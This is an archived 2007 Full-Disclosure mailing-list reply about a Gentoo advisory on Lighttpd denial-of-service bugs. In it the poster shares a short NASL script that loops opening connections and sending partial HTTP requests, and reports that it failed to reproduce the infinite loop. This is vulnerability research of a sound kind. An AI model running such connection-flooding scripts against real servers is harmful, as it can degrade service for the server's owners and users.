full-disclosure-uk May 2007 archive
Main Archive Page > Month Archives  > full-disclosure-uk archives
full-disclosure-uk: Re: [Full-disclosure] [ GLSA 200705-07 ] Lig

Re: [Full-disclosure] [ GLSA 200705-07 ] Lighttpd: Two Denials of Service

From: Michel Arboi <michel.arboi_at_nospam>
Date: Sat May 26 2007 - 14:07:35 GMT
To: full-disclosure@lists.grok.org.uk


> Robert Jakabosky discovered an infinite loop triggered by a connection
> abort when Lighttpd processes carriage return and line feed sequences.

Could anybody reproduce this DoS? I tried this NASL script without success. The server rejects connections for about one minute (because of kazillons of sockets in TIME_WAIT), but it only affects the attacking source IP and I could not launch any CPU loop.

$ more /tmp/ec.nasl
i= 0;

while (s = open_sock_tcp(80))
{
i ++;
send(socket: s, data: 'GET / HTTP/1.0\r\n'); close(s);
}
display(i, ' done\n');
$



Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/